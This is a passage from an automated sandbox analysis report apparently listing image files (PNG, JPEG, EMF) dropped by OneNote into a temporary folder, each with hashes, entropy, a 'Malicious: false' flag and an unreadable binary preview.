Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Temp\{577E9C92-688A-4C74-85E4-B27A4BC80E0C}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{58CB0834-036B-4B3E-9772-A8E4331A3937}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{590AD0E2-85A8-4F90-99C9-A8A52C39C394}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{59B1052D-7E2A-4EB3-8E9F-4AEFEC3D0479}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{5A9584CB-F73A-4C1D-AAA9-B71B027FFC60}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{5B5970CE-90B4-468B-9DF8-35ABA3AE5FED}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{5CBB2827-BC71-4BD9-83F4-BD24FADACD50}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{60A3B544-D9B8-420C-A43A-AB086ADD3752}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{613A202E-BDE3-4E55-B988-C97B7DE40AF9}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{613B9903-4D4C-4A6E-B114-DD5BA0B0BF28}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{61A0ED3A-7C53-4F9C-9DDC-B5AA83D944F4}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{61CD23EC-2D74-43EB-962B-D22BF53770DB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{625011D9-D118-4DD3-9692-CFCD926F2651}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{625FE3CC-0D82-4E0F-A136-FE87C36B88A5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
